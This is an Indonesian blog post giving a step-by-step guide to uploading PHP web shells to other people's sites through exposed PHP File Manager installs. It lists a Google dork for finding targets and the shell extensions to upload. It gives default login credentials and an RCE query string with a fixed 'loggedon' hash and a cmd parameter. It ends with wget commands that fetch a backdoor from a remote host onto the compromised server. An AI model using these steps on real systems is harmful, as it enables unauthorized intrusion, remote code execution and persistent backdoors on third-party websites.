3 Cara Upload Shell PHP filemanager

3 Cara Upload Shell PHP filemanager



Dork:intitle:"PHP File Manager" ext:php (kembangin)
Ada 3 Cara:
  • 1.Langsung Upload Shell
  • 2.PHP Filemanager Default Us/Pw
  • 3.PHP Filemanager RCE

    Ok langsung aja ke yang pertama pertama kalian dorking pakai dork diatas kembangin lagi biar dapet yang fresh dan banyak
    Dicara Yang Pertama Kalian Bisa Lansung Upload Shell kalian karena PHP Filemanager nya lansung kebuka seperti tampilan di gambar dibawah

    Cara Upload Shellnya:Klik Upload > Upload shell mu  ext : .php .phtml .php5 .php.fla .php.asolokentot:v
    Bila Vuln Shell Akan Lansung Ke Upload Dan untuk Akses Tergantung Upload Di directory mana ( TERGANGUNG WEB)
    Ok Lanjut Ke Cara Yang Kedua Biasany PHP Filemanager suka ada yang disuruh login,Nah bila nemu yang seperti itu :(, sans jgn sedih dulu, kita coba aja masukin username & password nya ini
  • Username : fm_admin
  • Password : fm_admin
    Bila Masuk Akan Ada Bacaan :You are logged in , tau kan artinya apa? yap kita udh berhasil login pakai username dan password diatas
    Nah kalau sudah login, bebas mau lo apain, upload shell juga bisa, jungkir balik juga bisa tampilan sesudah login
    Note : USERNAME SAMA PASSWORD YANG TADI GW KASIH, GK SEMUA BISA DI PHP FILE MANAGER LAINNYA
    Jadi Bila Tidak Bisa Memakai Cara Kedua OK kita coba yang terakhir
    Kalo Sudah Begitu Kita Coba RCE
    Parameter GET : ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=
    OK Lansung Aja
    Masukan parameter di atas setelah phpfm.php (atau nama lain tempat filemanager tersebut) Bila Vuln Biasanya Ada Bacaan Error: Command not informed
    Bingo Bila Nemu Yang Seperti itu lanjut kita coba wget backdoor , berikut command wget bagi yang belum tau :
    command : wget https://site.com/file.php wget https://site.com/file.php -O gans.php
    bila sudah wget backdoorny coba kita cek apakah ada atau tidaknya file
    kita caranya: cukup site.com/phpfm.php?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=wget
    Bila File yang kita wget ada disitu berarti shell kalian sudah terupload
    Sekian dari Saya mohon maaf bila ada salah ketik ataupun ucapan
    Thanks to:Phantom Ghost , Maxteroit , And All My Friend
    #Thanks Authornya Podol :v
  • Previous Post
    Next Post

    post written by:

    0 Comments: